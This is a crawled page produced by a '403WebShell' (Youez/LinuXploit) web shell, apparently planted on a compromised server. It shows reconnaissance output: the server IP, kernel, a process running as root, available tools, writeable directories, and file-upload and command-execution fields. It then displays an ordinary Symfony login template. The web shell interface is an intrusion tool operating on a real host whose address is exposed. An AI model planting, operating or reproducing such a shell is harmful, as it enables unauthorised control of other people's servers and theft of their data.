WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.217.62
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/src/Resources/FOSUserBundle/views/Security/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/src/Resources/FOSUserBundle/views/Security/login.html.twig
{% extends "security.html.twig" %}

{% block body %}
    <div class="login_screens">
        <div class="login_banner" style="background-image: url('{{asset('images/sura_login_bg.jpg')}}')"></div>
        <div class="login_form">
            <div class="display-table">
                <div class="vertical-align">
                    <div class="wrap">
                        <div class="inner_box">
                            <div class="form_excerpt">
                                <h4>Login</h4>
                                <p>Exciting stuff awaits you! Please fill your username and password to sign in into your account.</p>
                            </div>

                            <form action="{{ path("fos_user_security_check") }}" autocomplete="off" method="post">

                                {% if error %}
                                    <div class="notification error">
                                        {{ error.messageKey|trans(error.messageData, 'security')}}
                                    </div>
                                {% endif %}
                                {% if csrf_token %}
                                    <input type="hidden" name="_csrf_token" value="{{ csrf_token }}" />
                                {% endif %}

                                <div class="form_group">
                                    <label class="placeholder" for="username">Username or Email address</label>
                                    <input type="text" class="form-control" id="username" name="_username" value="{{ last_username }}" required="required" autocomplete="off" />
                                </div>

                                <div class="form_group">
                                    <label class="placeholder" for="password">Password</label>

                                    <input class="form-control" type="password" id="password" name="_password" required="required" autocomplete="off" />
                                </div>

                                <div class="form_group">
                                    <input type="submit" value="Login">
                                </div>

                                <div class="full-width forgot_pass">
                                    <div class="right_form">
                                        Forgot Password? <a href="{{ path('fos_user_resetting_request') }}">Reset</a>
                                    </div>
                                </div>

                                <div class="options_divider">
                                    <span>OR</span>
                                </div>

                                <div class="form_group">
                                    <a href="{{ path('connect_google_start') }}" class="google_login">
                                        <img src="{{asset('images/google_icon.svg')}}" alt="">
                                        <span>Login with Google</span>
                                    </a>
                                </div>

                                <div class="form_group">
                                    <a href="{{ path('connect_facebook_start') }}" class="facebook_login">
                                        <img src="{{asset('images/facebook_login.svg')}}" alt="">
                                        <span>Login with Facebook</span>
                                    </a>
                                </div>

                                <div class="forgot_pass">
                                    Don’t have an account ? <a href="{{ path('fos_user_registration_register') }}">Register</a>
                                </div>


                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

{% endblock body %}
{% block superjs %}
    <script src="{{ asset('js/login.js') }}" type="text/javascript"></script>
{% endblock superjs %}

Youez - 2016 - github.com/yon3zu
LinuXploit